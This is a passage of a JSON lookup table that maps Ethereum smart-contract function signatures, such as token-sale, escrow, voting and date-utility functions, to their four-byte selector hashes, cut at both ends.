"0xda8567cb", "queryItems(bytes32,uint256,bool[6],bool)": "0x8e604b1d", "itemsCounts()": "0x81a1fa02", "itemsCount()": "0xe2c03ace", "executeRequest(bytes32)": "0xe9c24166", "challengeClearing(bytes32)": "0x342d9a04", "challengeRegistration(bytes32)": "0xb783d6c7", "requestClearing(bytes32)": "0x93519d66", "requestRegistration(bytes32)": "0xbc16272d", "executeRuling(uint256,uint256)": "0xd96152c3", "rule(uint256,uint256)": "0x311a6c56", "currentRuling(uint256)": "0x1c3db16d", "disputeStatus(uint256)": "0x10f169e8", "appealCost(uint256,bytes)": "0xf23f16e6", "appeal(uint256,bytes)": "0x49912f88", "arbitrationCost(bytes)": "0xf7434ea9", "createDispute(uint256,bytes)": "0xc13517e1", "isPermitted(bytes32)": "0xbeabdb7b", "AcademyToken(address)": "0xa3c86bef", "addPhrase(string)": "0x75114bcc", "ChenXiangToken(uint256,string,string)": "0x069b9232", "restoreWebGift(address)": "0x2fb07482", "_logSendWebGiftAndSendEther(address,uint256)": "0x0d8c2f67", "_buyIcoToken(uint256)": "0xe5212deb", "buyIcoToken2(uint256)": "0x9c58c509", "buyIcoToken1()": "0x1a9f170d", "getAvaIcoAmount()": "0x4a168859", "icoIsOver()": "0x054348d6", "getIcoPrice()": "0x4308a36b", "_sendGameGift(address,uint256)": "0xa595a94d", "sendGameGift2(address,uint256)": "0x296dbf31", "_canSendGameGift()": "0x6578d920", "gameGifIsOver()": "0xb77d09c9", "setGameGiftOnceAmount(uint256)": "0x116b7aa9", "timesIsOver(address)": "0xf69f18a6", "_logGameGiftInfo(address)": "0xf3a8bcaa", "setGameTransferFlag(address,bool)": "0x5c22aaae", "batchSendWebGiftToken(address[],uint256)": "0xe1c941b0", "_sendWebGiftToken(address,uint256)": "0x259c95c4", "sendWebGiftToken(address,uint256)": "0x26d312f7", "setWebGiftOnceMaxAmount(uint256)": "0xab60e4e5", "canSendWebGifAmount()": "0x12432fee", "canSendWebGift()": "0x07d94ac7", "setStopSendWebGift(bool)": "0xfa83c01b", "setWebGiftEtherAmount(uint256)": "0xba157d46", "setSantaClaus(address)": "0x0e54316f", "addYearToken()": "0xe29c6a7b", "DonQuixoteToken(address)": "0x9c14e25b", "webGiftUnTransfer(address,address)": "0x74816d1e", "emergencyTransfer(uint256,address)": "0x55619911", "setEmergencySecrets(uint256,uint256)": "0xcb2bea55", "call(address,bytes,uint256)": "0x4ae00041", "WalletWithEmergencyTransfer()": "0xd0f15e9e", "withdrawFund(uint256,bool)": "0x86578375", "viewMyContribution(bool)": "0x01b6b523", "viewCrowdSaleLive(bool,bool)": "0xc2783ee5", "unlockFundrBal(bool)": "0x5de6f040", "viewAllControls(bool)": "0x529db099", "startOrHoldCrowdSale(bool,bool,bool,uint256,bool)": "0xb3e3d8b4", "setFundingGoal(uint256,bool)": "0x29c924cf", "_getTknAddr()": "0xef2c5842", "setContrAddr(address,address)": "0x590efa59", "CrowdSaleMacroansyA()": "0x88c7b6e6", "TestTokenA()": "0x2646754d", "MasterMindAlliance()": "0xbdc2866e", "Goldencloudtoken()": "0x9553652b", "summary()": "0xb16a867c", "transferTokens(address,uint256,address)": "0x4af350eb", "canBuy(uint256)": "0x3ca88a2f", "KkkTokenSale(uint256,address)": "0xbb813a9b", "BLOCKMALLToken()": "0x987b7967", "AntasCoin()": "0x2d217d43", "TPLAYToken(uint256,string,string,uint8)": "0xa395e2cc", "WeClosedInto()": "0xc68fe0c1", "changePOI(address)": "0xc7fde81f", "ArtChainToken()": "0xa1acf069", "WhaleWater()": "0x37ede426", "LLV_311_EDIT_2()": "0xe0b6cddd", "TestingUseCoin(uint256,string,string)": "0x2f77688b", "Aerosyn()": "0xa01eacc2", "averageScrapPrice()": "0x25b56dd4", "DutchAuction(address,uint256)": "0x46a5b318", "_computeFee(uint256)": "0x13c32148", "_purchase(uint256,uint256)": "0x18bd21f9", "setMinDuration(uint256)": "0x1674bade", "NFTAuctionBase()": "0xf55bddcc", "_tokenOfOwnerByIndex(address,uint256)": "0x27071f6a", "_metadata(uint256)": "0x13859f46", "stringToUint8(string)": "0xf8c8de10", "stringToUint32(string)": "0xa17d713a", "substring(string,uint256,uint256)": "0x1dcd9b55", "EtherbotsBase()": "0xb59d7fe6", "awardHighScore()": "0x184018c6", "recordHighScore(uint256,address)": "0x80a37e23", "getNextPayoutEstimation()": "0xd69a1a5f", "getCurrentJackpot()": "0x9f57d16e", "getCurrentHighscoreUser()": "0x28d08142", "getCurrentHighscore()": "0xc5cf8c7e", "payEntryFee()": "0x7037ec6f", "EthBird()": "0x63669424", "DOJC()": "0xd6ad00a9", "transferDividendToShares()": "0xa5f257e7", "changeGasFee(uint256)": "0x70f8de1f", "changeTradeFee(uint256)": "0xa16bed3a", "Cryptex(address,address,address,uint256,uint256,uint256)": "0x360998e6", "MGLTToken()": "0x521ec3af", "getCityData(uint256)": "0x6c241bb1", "getRentOwed(address)": "0x03dec463", "withdrawRent(address)": "0x5a5ebebf", "updateSinglePayout(address,uint256)": "0x257d5995", "updatePayout(address)": "0xedcb9e9e", "setPayout(uint256,uint256)": "0xfafb2330", "transferCity(address,address,uint256)": "0x3c893718", "purchaseCity(uint256)": "0xff09ff99", "createMultiple(uint256[],uint256[],uint256[],address)": "0x56e62326", "createListing(uint256,uint256,uint256,address)": "0x8ebaae08", "createPromoListing(uint256,uint256,uint256)": "0x70ce0765", "getCountryData(uint256)": "0xacf36037", "getOld_BalanceOfr(address)": "0x133e3f71", "PundiXToken()": "0xf582fe70", "HELLO()": "0xfcd6ec11", "getChainCode(string)": "0xccedf3d2", "getChainName(uint32)": "0x426ad3f5", "isChainCode(uint32)": "0x0995efb5", "isChain(string)": "0xe0f6cc07", "isCaller(address)": "0x7ac07dcc", "getAppCode(address)": "0x56bb9b43", "getAppInfo(uint32)": "0xa5cae60c", "getAppTokenCode(uint32)": "0x8d22b345", "getAppChainCode(uint32)": "0xa17ea25b", "getAppAddress(uint32)": "0x7466ee48", "isApper(address)": "0xb9358ba4", "changeGatewayAddr(address)": "0x0eb1947f", "propose(address,string,string,string,string,string,uint256,uint256,uint256,uint256)": "0x0ef845df", "reset(uint256,uint256,uint256)": "0xa6801cbd", "SuperSkyNet()": "0x17a689f3", "map_address(string)": "0xfa42f3e5", "get_address(address)": "0x5d4f30e7", "removeNameByOwner(string)": "0xe0b438ef", "removeName(string)": "0x6a43aae7", "removeSeller(address)": "0x7cb9cf54", "sellers(uint256)": "0xcee26ed5", "GBPsToken()": "0x13b5a19e", "setLocks(address[],uint256[])": "0xadeb8dec", "quaker(address)": "0xc4620549", "listFiles(uint256,uint256)": "0x1927a8ea", "verifyFile(string)": "0xb0271023", "validateFile(address,uint256,bytes,bool,bool)": "0xbb0bef19", "validateWallet(address,bool,string)": "0xfe8312c1", "validatePublisher(address,bool,string)": "0xd22e7b69", "KhuuKoin()": "0xba7b86b9", "getTakerBet(uint256,address,uint256,address)": "0x070fdb96", "getMakerBetDetails(uint256,address)": "0xb9ff5fcf", "getMakerBetBasicInfo(uint256,address)": "0xa4447515", "getVerifier(address)": "0x059ce95d", "settleBet(uint256,address,uint256)": "0x5f9e1080", "takeBet(uint256,address,uint256,uint256)": "0x8d3d70df", "closeBet(uint256)": "0xa24beff7", "reopenBet(uint256)": "0xfc7368fa", "pauseBet(uint256)": "0x0e541185", "updateOdds(uint256,uint256)": "0xaebc0310", "addFund(uint256)": "0x346c96e9", "makeBet(uint256,uint256,address,uint256,uint256)": "0x41e8da52", "updateVerifier(uint256)": "0x5ada7bee", "changeBaseVerifierFee(uint256)": "0xa5ec4fae", "changeAllowedTakerBetsPerMakerBet(uint256,uint256)": "0x65eb0dec", "changeMinMakerBetFund(uint256)": "0xa19ee7a3", "EBBToken(address,uint256)": "0x031a36f1", "FivePercent4Ever()": "0xb47779ce", "ROG()": "0x97f1943c", "EAI_TokenERC20(uint256,string,string)": "0xf5af6289", "checkTokenBalanceState(address)": "0x944ea02d", "removeExclusionFromTokenUnlocks(address[])": "0xb7c8a90a", "addExclusionFromTokenUnlocks(address[])": "0xadc8f941", "changeLockedBalanceManually(address,uint256)": "0x5936812b", "lockedTokenTransfer(address[],uint256[])": "0xeb975390", "ReinsureSeveralDeaths(bool)": "0xe5a6fadd", "LifeSet_002()": "0x491045af", "Pilendthereum(uint256,string,string)": "0xd83c68b9", "MathisTestToken()": "0x65395242", "RYZToken()": "0x9de2bd2f", "zhoudayiToken(uint256,string,uint8,string)": "0x1c22f765", "Healthcoin()": "0x9ba30c3b", "updateOffChainTokens(uint256)": "0xf3678cd3", "updateMinSpend(uint256)": "0x5c3e38ee", "safedrawal(uint256)": "0x7199f6d4", "decision(bytes32,string,address[],uint256[])": "0x97b27c46", "postTrade(bytes32,uint256)": "0x77b1788e", "_getFinalAddress(uint256[],address[],uint256)": "0xfba6e51b", "getDecision(bytes32)": "0xd8c57892", "setDecision(bytes32,address,address)": "0x653abf37", "setGood(bytes32,uint256)": "0x1c4b1ff7", "calcInvalidKeys(uint256,uint256)": "0x8f699f6c", "clearKeys(uint256)": "0x32df3068", "BlockPlanet()": "0x6683ee49", "rewardTokens(address)": "0xf5ab16cc", "makeSale(uint256)": "0x364083f4", "setRelayContractAddress(address)": "0x2d2bcd37", "setWithdrawAddress(address)": "0x3ab1a494", "editModule(uint256,uint256,address,bytes4)": "0x944da654", "getModuleByName(string)": "0xf13d22c1", "getModuleById(uint256)": "0x720ed642", "getModuleId(string)": "0x77913fbc", "listModule(uint256,bytes32,bytes32,string,bytes4)": "0x76e83bcb", "setApiCallsContractAddress(address)": "0xb5d0c747", "setApiRegistryContractAddress(address)": "0x6ebd9d7f", "setRegistryContractAddress(address)": "0xd20838f4", "setLicenseSalesContractAddress(address)": "0x2c6f39fd", "DiamondBond()": "0xeba9a4a8", "BitcoinEther()": "0xc39afb0b", "WinbitToken(uint256,string,string)": "0x0839f2ee", "removeFromTokenLocked(address[])": "0x52c944b2", "addToTokenLocked(address[])": "0xbb158dd5", "removeWhitelistedTransfer(address[])": "0x69c89774", "addWhitelistedTransfer(address[])": "0x29163502", "sendAirdrops(address[],uint256[])": "0xf821c423", "NormalToken(string,string,uint256,uint8)": "0x07d0da7e", "ReducingSupplyCoin()": "0xc28e6e39", "ROA()": "0xa6a633af", "BellaStandardToken(uint256,string,uint8,string)": "0xf97cebed", "BROYALCOIN()": "0x636ae15d", "delegateAddress()": "0x6d96a2aa", "icoRunning()": "0xd17291bd", "slackUsersCap()": "0x7d8f94a0", "allowContribution()": "0xc319e412", "commissionSum()": "0xdc1fdff0", "CaDataAddress()": "0x703f5e8a", "transferSafety()": "0x1284c8f5", "refundEndDate()": "0x947721dd", "ethPriceProvider()": "0xe41f7dc1", "MINIMAL_WEI()": "0xbc6fd6d9", "NeptunSupply()": "0xb0786de9", "noContributors()": "0xf03aa262", "decimalPlace()": "0xe32cb7fc", "numcalls()": "0x6e8b7c23", "lastBlock_a8Hash_uint256()": "0xb822b28a", "m_thawTS()": "0x92a70756", "returnATXChanges()": "0xd0868223", "saltHash()": "0x6494d477", "divIntervalDays()": "0x8efd5f92", "FEE_NUMERATOR()": "0x41cd47bf", "isSaleMarket()": "0x6066b066", "enable_refunds()": "0x5cd96091", "lowEth()": "0xa1d25205", "hype()": "0x6ecf9f7b", "TARGET_USER()": "0x726a431a", "awardsReservations()": "0x04b4e7e5", "FOUNDATION_STAKE()": "0x8d6cd879", "getMoneyline()": "0xab08f75b", "KPOP_CELEB_CONTRACT_ADDRESS()": "0x6fad0a4d", "tokensaleEndTime()": "0x4a330319", "tokenFallbackData()": "0x1e626456", "devSENSDestination()": "0x7a309005", "presaleStartDate()": "0x80a3a783", "milliPercent()": "0x2cc763e7", "endTimeSale1()": "0xd1013fec", "rewardsCount()": "0x8699a65f", "addrBounty()": "0xafff9720", "preSaleBonus2Amount()": "0x5cc39659", "createProxyAddress()": "0x8b21d307", "StexTalk()": "0x1e3ba941", "initialize_proposal()": "0x36937781", "SIGMA_EXTRACTION_BASE()": "0x005b7ce8", "totalTokensWithdrawn()": "0xcac37f93", "ICOSALE_JOINTTOKENS()": "0xfd4446f3", "taxMan()": "0xb41e6640", "tokensSoldIco()": "0x6e0da971", "basicDayPercent()": "0x70d762c2", "gweiBBDPriceInWei()": "0xb3753107", "CPCEFundDeposit()": "0x51c3a2c6", "isTransferEnabled()": "0xcca5dcb6", "currentDrop()": "0x1245c653", "crowdsaleFinalized()": "0x597d4601", "PRICE_5()": "0x33455dd0", "marginForMajority()": "0x77e60f42", "token1stContract()": "0xe5286c80", "seriesCSupply()": "0x54ccdb0d", "minRaise()": "0xcebf3bb7", "preICOstart()": "0x35139014", "roundICO()": "0x1a311968", "fetchProfit()": "0x7aa86e2f", "StageTwoDisable()": "0x065ece90", "communityContributionQuota()": "0xe1859169", "GAMEPAUSED()": "0xf331020c", "callBackGasAmount()": "0x623ba5c9", "calculate()": "0xca77ab65", "DONATION_WALLET()": "0x092f9d79", "creationProfit()": "0x33fa59f0", "totalTeamContributorIds()": "0xbef17ed0", "nextContributorIndex()": "0x9561a038", "REQUEST_CANCELED_BY_CREATOR()": "0x0b679d2c", "isUpgradeAllowed()": "0x1c0463de", "m_nextSale()": "0xfd0326b4", "min()": "0xf8897945", "bonusOptionsPromille()": "0x8ad1896c", "USDETHRATE()": "0x8969fb5f", "ETH_USD_rate()": "0xe7a6e75c", "outingreserveBalance()": "0xc120d1a4", "totalValue()": "0xd4c3eea0", "liquidityReserveWallet()": "0xbf44eb03", "TOKEN_PRICE_NUM()": "0xcb51f777", "stage1Bonus()": "0x3ae34403", "tokenCountSet()": "0xcb912ffb", "epsilon()": "0xa7ba9fb1", "buyQST()": "0x162d7daf", "masterHas()": "0x1223716a", "OWNERS()": "0x2a9078d6", "PRIVATE_SUPPLY_ADDRESS()": "0xc3a18dec", "INVESTOR2()": "0xb8a4b858", "onceOuttime()": "0xf9589eb3", "canceled()": "0x3f9942ff", "SALE_MIN_CAP()": "0x3b6c6c72", "kittensSold()": "0xc287820a", "btcRate()": "0xd2719d22", "lastWithdrawTime()": "0xab231511", "singularDTVToken()": "0x87efeeb6", "publicSaleTokensAvailable()": "0x34c1ef77", "cofoundersSupplyDistributed()": "0x652ca8f4", "presale_finish()": "0x1a8c7243", "CheckActivate()": "0xe703e9c3", "totalIRCAllocated()": "0xc8bf3388", "maximumDeposit()": "0x54b302c5", "exchangeRateIco()": "0x09b258f7", "balanceInPlay()": "0x4586e4ab", "saleSharesAvail()": "0xda465d3f", "Free_vote_for_candidate_B()": "0x15e82e87", "startTransferGet()": "0xb72f547d", "totalNonSaleSupply()": "0x065f7a98", "rebateTwoFenzi_()": "0x317ed7dc", "PlatformAutonomyAddr()": "0xb210f639", "arpToken()": "0x2a8eb9a3", "stoppable()": "0xbb4872de", "validAstroCount()": "0xdad5c2e3", "foundEvidence()": "0xd226d11f", "digitalSignature()": "0x97e92794", "totalZTKCheckAmounts()": "0xc6eda379", "authorized()": "0x456cb7c6", "searchString()": "0x1180788e", "getNamedAddresses()": "0x3ccad6fc", "accICO()": "0x46edef6c", "ROLE_REVIEWER()": "0x5f6a4546", "privateSaleTokensAvailable()": "0xbbaac1e8", "pubsaleDeadline()": "0x06a46703", "angelInvestors()": "0xb3c298ea", "hardCapTime()": "0x3bd87ebd", "lotteryId()": "0xe580f47b", "AIRDROP_START_AT()": "0xf7a084c0", "orders()": "0x4fb764c9", "ownerCMIT()": "0xc2ecdf8e", "unblockTokenTime()": "0x7874d32c", "genesisVirus()": "0xc21ed112", "PrevOwner()": "0xf0456691", "claimProfitEquivalent()": "0x77bf96d4", "_maxTokenSoldPreICO()": "0xbc1af71d", "is_proposal_supported()": "0xfe602c65", "MAIN_SALE_BONUS_PERCENTAGE_PHASE1()": "0xc8016c85", "infoTokenSilverRatio()": "0x3cc7fd84", "MIN_GOAL_EBC()": "0x655e51f2", "cardContract()": "0x693bd2d0", "vote03YesCount()": "0x1a750945", "getDistributionStatus()": "0xa1b140b6", "_advisorsSupply()": "0xde176643", "getPresaleMaxValue()": "0xc8d3db82", "teamTokensAccount()": "0x85a242d7", "preMining()": "0x7b6b3f46", "capOfTotalSupply()": "0xd3418fb7", "totalWannaBuyAmount()": "0xad78dc8e", "withdrawal2()": "0xd2234b37", "claim_eth_by_address()": "0x41aaccb0", "controllerAddress()": "0x4b24ea47", "ownerAdmin()": "0xfa49841d", "rntTokenVault()": "0x1d029641", "icoTokensPrice()": "0xdde1589c", "STATE_PLAYING()": "0x53f3807c", "refundeadline()": "0xbf7929a6", "totalSupplied()": "0x630fd0ac", "payTo()": "0xb837c58e", "bountyOfflineWallet()": "0xdbf76c03", "whitelistThreshold()": "0xb5dadb17", "old_address()": "0x7db2cff8", "ContributionAmount()": "0x1bcd57c7", "min_refund_block()": "0xcc74e2ca", "IcoCompleted()": "0xcf15b87d", "summBounty()": "0x58beec9f", "donateEth()": "0xaadd1b03", "mapMaster()": "0xf4d176e1", "lockTokensPercent()": "0xc7b0f0ca", "dailyAdminAllowance()": "0x8a87b5c5", "prev_hash()": "0xc69b5df2", "promoGen0()": "0x70d4d7b4", "userPoolFund()": "0x32cae0a8", "nexium()": "0x7abaf552", "CLAIM_STAGE()": "0xb34f0e5e", "firstStageMinting()": "0x1862caec", "preICOstate()": "0x35e24a6b", "teleportToken()": "0xa7f879ea", "teamPeriodAmount()": "0x75766294", "dead()": "0x36cf7c87", "sessionDuration()": "0xece35d01", "lastGameId()": "0x3ee9d648", "weiRound1()": "0x1391697d", "amountSoldPerPeriod()": "0x640853bb", "firstValidBlockNumber()": "0xb7dc8a32", "totalEthInWeiForFirstIco()": "0x036bd387", "getTotalEthSended()": "0x46f76648", "gasForCLOUD()": "0xcccf3a94", "later()": "0xc7cc4ee9", "endEarlyStage1()": "0x60f38d91", "powerContract()": "0x3617653e", "BLO_PER_WEI()": "0xad631abe", "percentageQuarter2()": "0x9ebe4d98", "channelMaxSize()": "0x9f53e07b", "tokenLimit()": "0x56c7627e", "SCEscrow()": "0x07fb462c", "sigTeamAndAdvisersEDUSupply()": "0x38118614", "makerAffiliateFee()": "0xe1b53078", "portalAddress()": "0xa172db06", "FileDataInt()": "0x726c12c8", "presaleStart()": "0xde8801e5", "capETH()": "0xb9fa2055", "openWhitelistEndTime()": "0x3708c99e", "getCompte_7()": "0x04676af4", "setCompte_7(string)": "0x21998504", "getCompte_6()": "0xe58b69f2", "setCompte_6(string)": "0x93778e2d", "getCompte_5()": "0xe6691249", "setCompte_5(string)": "0x884a2308", "Annexe_SO_DIVA_SAS_5()": "0xd04301f2", "ECToken()": "0x58d75180", "BonumPreICO(address,uint256)": "0x928187a8", "ProsperPresaleToken(address,string,string,uint256,uint8)": "0x43a085c2", "Save()": "0xc2e171d7", "TryUnLockCreatorBalance()": "0x8344d26d", "CryptoQuantumTradingFund()": "0xb62c208f", "commandMintBonus(address)": "0x80661555", "GlobalLotteryToken()": "0x51df6d27", "HOPEtoken()": "0x1580beb7", "adm_trasfer(address,address,uint256)": "0x88af883b", "setTransferStatus(uint256)": "0xd6e89cf0", "getConBal()": "0x2242cf7f", "PGM_Coin()": "0x7a44d730", "ATMToken()": "0x49e1c2b7", "MANHATTANPROXYFDR()": "0xcd53ac45", "endMigrationPeriod()": "0xdd838808", "migrateUsers(address[10])": "0xf60a696d", "migratePropertyOwnership(uint16[10])": "0xa1350c00", "PXLProperty(address)": "0x0aef8655", "reverse(address,uint256)": "0x2126a923", "changeSupply(uint256,bool)": "0x28ab4f76", "buyWithReferral(address)": "0xa17dd26c", "setReferralPromille(uint8)": "0x9cb931f9", "setBlocking(address,address,bool)": "0x84c7bf4c", "MoveChain(uint256,string,uint8,string)": "0xda1ee417", "HJF()": "0x8a7a8f46", "DOG_Token()": "0xe2c3941a", "BetcoinICO()": "0xe0585ce8", "setStreamityContractAddress(address)": "0xb0dbce71", "transferMinusComission(address,uint256,uint256)": "0xc77f58c8", "approveDeal(bytes32)": "0xf28c0716", "cancelSeller(bytes32,uint256)": "0xe5a17818", "releaseTokensForce(bytes32)": "0xa9a1fb96", "releaseTokens(bytes32,uint256)": "0x03b9b4f9", "getStatusDeal(bytes32)": "0x41b6f6ce", "withdrawCommisionToAddressAltCoin(address,uint256)": "0x8b845c1d", "withdrawCommisionToAddress(address,uint256)": "0xe0f47580", "startDealForUser(bytes32,address,address,uint256,uint256,bool)": "0xe4d433e8", "verifyDeal(bytes32,bytes)": "0xf7e78e78", "payAltCoin(bytes32,address,address,uint256,uint256,bytes)": "0x92a93d33", "pay(bytes32,address,address,uint256,uint256,bytes)": "0xfe908b7a", "StreamityEscrow(address)": "0xa58b55a9", "StreamityContract()": "0x9cccaea9", "withDiscount(uint256,uint256)": "0x9ab79905", "transferWeb3js(address,uint256)": "0xee67575f", "startCrowd(uint256,uint256,uint256,uint8,uint8)": "0x5bda1af0", "crowdSaleStatus()": "0xd12f6938", "changeRate(uint256,uint256)": "0xa883b0c4", "unpauseInternal()": "0x2be596ee", "pauseInternal()": "0x06f74bcf", "DEX(address,address,address,uint256,uint256,uint256)": "0xdcdd9af2", "sendEcosysSupplyToken(address,uint256)": "0xbfc0cc5c", "sendBountySupplyToken(address,uint256)": "0x9baddd98", "sendCommunitySupplyToken(address,uint256)": "0x8aaf699d", "sendTeamSupplyToken(address,uint256)": "0xbab5714c", "sendICOSupplyToken(address,uint256)": "0x8508d88f", "CBITToken()": "0xef14a0f6", "Sorus()": "0x9b41b00b", "NewPiedPiperCoin(string,string,uint8,uint256)": "0xc603c97b", "getStateFunding()": "0xadd052b4", "changeTokensPerUSD(uint256)": "0x7a5615c0", "changeEndPreSale(uint256)": "0xa29cd847", "changeEndPrivateSale(uint256)": "0xba2ab079", "finalizeTokenSale()": "0x7693488b", "alottTokensExchange(address,uint256)": "0x3f3a1ed2", "NewTokenSale(address,address)": "0x99405ad7", "checkExistsInArray(address)": "0x9a78c066", "alottMainSaleToken(address[])": "0x10f40804", "changeminpublicsale(uint256)": "0xfef9b5ae", "changeminpresale(uint256)": "0x3ddac459", "changeminprivatesale(uint256)": "0x49d45693", "changepresalebonus(uint256)": "0x73e2212e", "changepublicbonus(uint256)": "0x51c9b233", "changeprivatebonus(uint256)": "0x5608b6d9", "getLatest(uint256,uint256)": "0xe3643106", "GACToken(uint256,uint256)": "0xa9d5e255", "addSaleAgent(address)": "0xbae0c536", "setTokenPrice(uint256,uint256,uint256)": "0xbca2b941", "transferToken(address,uint256,uint8)": "0x2265931d", "availableTokenBalance(uint256,uint8)": "0xc795dd24", "validPurchase(uint256,address)": "0x9cfd5dc4", "CrowdsaleiPRONTOLiveICO()": "0x8bcd0680", "isValidKyc(address)": "0x01d2db89", "approveKyc(address[])": "0x982475a9", "IprontoToken()": "0x1c5ca530", "DouYinToken()": "0x88ad52f0", "finalizeChangeName()": "0xc112a083", "finalizeReplaceTrueUSD()": "0x2519a378", "finalizeSetDelegatedFrom()": "0x4a7de068", "finalizeDelegation()": "0x4d71d6be", "finalizeChangeStaker()": "0x27f2db32", "finalizeChangeStakingFees()": "0x64ab23c9", "finalizeChangeBurnBounds()": "0x267822c1", "SeedMemberCanDraw()": "0x576b8bba", "MakeWinner(address,uint256,uint256)": "0xbddcfead", "Prepare()": "0x3a0e0418", "BuySeed()": "0xedca371d", "managePlayer(address,uint256)": "0x9f2e0f9c", "DoAirDrop(address,uint256)": "0xf1348138", "BuyTicketUseVault(uint256,uint256)": "0xccd46ae4", "BuyTicket(uint256)": "0x76acb5e8", "IsSeedMember(address)": "0x8237ab8d", "CheckPrepare()": "0x1b05ea8c", "getMemberAddr(uint256)": "0x7a178741", "getMemberId(address)": "0xc269014b", "transferTokensTo(address)": "0xb6edd743", "ProdFToken()": "0x18911bbe", "ALpay(uint256,string,string)": "0x39203874", "getBal()": "0x25caa262", "payme()": "0xba6361fb", "CMTTT()": "0x9cea127f", "exchange(uint256,address,uint256)": "0xd6b867e6", "tryTakeBack(uint256,uint256)": "0x49550d66", "trySell(uint256,uint256)": "0x73475373", "tryBuy(uint256,uint256)": "0x24452f44", "getDogInfo(uint256)": "0x362f5fb2", "getTxcode(uint256)": "0xf332511f", "exchangeByAdmin(uint256,address)": "0x7236f851", "createDog(uint256,address)": "0x9f7f2bd1", "WinCoin()": "0x7754ec29", "fechAllVoteResultForCurrent()": "0x1f8f69e3", "fechAllVoteResultPreStageByBlock(uint256)": "0xc90189e4", "fechAllVoteResultBySnapshotBlock(uint256)": "0xf206e7c9", "fechVoteResultForCandidateBySnapshotBlock(address,uint256)": "0x15cf7a35", "fechVoteNumForCandidateBySnapshotBlock(address,uint256)": "0x7973c57f", "fechCurrentSnapshotBlockIndex()": "0x521e5770", "fechStageIndexBySnapshotBlock(uint256)": "0xf924c276", "fechSnapshotBlockByIndex(uint256)": "0x7430faf4", "fechVoteInfoForVoterBySnapshotBlock(address,uint256)": "0xa6ba250c", "fechVoteMainInfoBySnapshotBlock(uint256)": "0x7e49d530", "fechAllVotersBySnapshotBlock(uint256)": "0x3e1b0d29", "fechAllCandidatesBySnapshotBlock(uint256)": "0x3d405342", "voteNoLockBatch(address[],uint256[])": "0x3108bd87", "voteNoLockByAdminBatch(address[],address[],uint256[])": "0x23cafc3d", "voteNoLockByAdmin(address,address,uint256)": "0xce53ee2d", "setSnapshotBalanceBatch(address[],uint256[])": "0x17d6de15", "setSnapshotBalance(address,uint256)": "0x1e22648a", "cancelVoteForCandidateBySnapshotBlock(address,uint256,uint256)": "0x94a0c1cc", "deleteCandidateBySnapshotBlock(address,uint256)": "0xe8ee8c75", "updateContract(uint256,uint256,uint256,uint256)": "0x1ca9fb9d", "setRound(uint256)": "0x9b624e7b", "deleteAdmin(address)": "0x27e1f7df", "Sotoin()": "0x9d882b5d", "oykooshi()": "0xd6bfc2d4", "setNewMembers(address,address,uint256,uint256)": "0xe1404b41", "ReFund()": "0x1d9b1d85", "SingularityTest24()": "0xd638d981", "diffSeconds(uint256,uint256)": "0x62fb9697", "diffMinutes(uint256,uint256)": "0x02e98e0d", "diffHours(uint256,uint256)": "0x2af123b8", "diffDays(uint256,uint256)": "0xc9d34622", "diffMonths(uint256,uint256)": "0x7be34109", "diffYears(uint256,uint256)": "0xff2258cb", "subSeconds(uint256,uint256)": "0xf615ed54", "subMinutes(uint256,uint256)": "0x9e524caa", "subHours(uint256,uint256)": "0x00501553", "subDays(uint256,uint256)": "0xc7b6fd6a", "subMonths(uint256,uint256)": "0xad203bd4", "subYears(uint256,uint256)": "0x444fda82", "addSeconds(uint256,uint256)": "0x8d4a2d39", "addMinutes(uint256,uint256)": "0x89a3a00d", "addHours(uint256,uint256)": "0x4b321502", "addDays(uint256,uint256)": "0x7217523c", "addMonths(uint256,uint256)": "0x4355644d", "addYears(uint256,uint256)": "0x442b8c79", "getDayOfWeek(uint256)": "0x22f8a2b8", "_getDaysInMonth(uint256,uint256)": "0x3f9e0eb7", "getDaysInMonth(uint256)": "0x10848ddf", "isWeekEnd(uint256)": "0x4371c465", "isWeekDay(uint256)": "0xd6582d0d", "_isLeapYear(uint256)": "0xb05eb08d", "isLeapYear(uint256)": "0xb8d16dbc", "isValidDateTime(uint256,uint256,uint256,uint256,uint256,uint256)": "0x3293d007", "isValidDate(uint256,uint256,uint256)": "0x14b2d6dc", "timestampToDateTime(uint256)": "0xea1c1690", "timestampToDate(uint256)": "0xde5101af", "timestampFromDateTime(uint256,uint256,uint256,uint256,uint256,uint256)": "0x5e05bd6d", "timestampFromDate(uint256,uint256,uint256)": "0x1f4f77b2", "_daysToDate(uint256)": "0x90059aed", "_daysFromDate(uint256,uint256,uint256)": "0x1e0582e9", "alimtoken()": "0x2d8df871", "Adnity()": "0xc2df8815", "getTotalLockedBalance(address)": "0xf1001f8c", "getLockedBalance(address,uint8)": "0xd105350b", "getUserMilestone(address)": "0x0bf7fb57", "removeMilestoneFrom(address,uint8)": "0x0a7fb746", "modifyMilestoneTo(address,uint8,uint8)": "0x1d6d8d60", "getPolicyLockedPercentage(uint8)": "0x1cc70934", "finishingWithdrawing()": "0x576709a2", "popToken(address)": "0x8c3692c3", "pushToken(address[],uint256,uint256)": "0xd27626fd", "EnishiCoin(address[])": "0x67f76863", "removeOwner(address,address)": "0xfbe5ce0a", "curent_mul()": "0x326abfce", "bitmask_show(address)": "0x9665ef09", "withdraw_dao_fund(address)": "0x78a5f0ca", "withdraw_team_fund(address)": "0x4be7ced7", "proposalActive(uint256)": "0x35743ac9", "proposalWeight(uint256)": "0xf0474350", "swapProposal(uint256)": "0xe0472e36", "StartNewIteration()": "0xc33890ff", "swipeToken()": "0x492c70fb", "bat_match(uint256[39])": "0x810cbbd0", "FlexCoin()": "0xe834e89c", "GeeTestCoin()": "0xcce48e65", "willyWantTalkToken()": "0x582d9008", "MCST()": "0x422fcbd5", "tessrX()": "0x87d25299", "giveExchangeRateAdvice(uint256)": "0x75355e34", "fiatToWei(uint256)": "0x0d469483", "takeRent(address)": "0x7aa3803c", "getAmountDue(address)": "0xe3edbfd3", "_depositForRenter(address,uint256)": "0xb51bda59", "renterExists(address)": "0xf9d8241c", "getRenter(address)": "0x6a4b27f4", "signLease(string,string)": "0x1695533d", "MonaLease(string,uint256,uint256,address)": "0x08700f0b", "Bitnusu()": "0x50933a0f", "DadsToken()": "0xeb60c5d7", "_canBreedViaAuction(uint256,uint256)": "0x404635db", "approveBreeding(address,uint256)": "0x6bc02730", "_isBreedingPermitted(uint256,uint256)": "0x2f0579db", "createGen0Token(uint8)": "0xd68e9b1e", "_generateRandomDna()": "0xc7a08487", "_createToken(uint256,uint256,uint256,uint256,uint256,address)": "0x2b0ac7c4", "getPositionCount1(address,address)": "0x792b476b", "realBalanceOf(address)": "0x99a03c70", "bbye()": "0xa2b7976d", 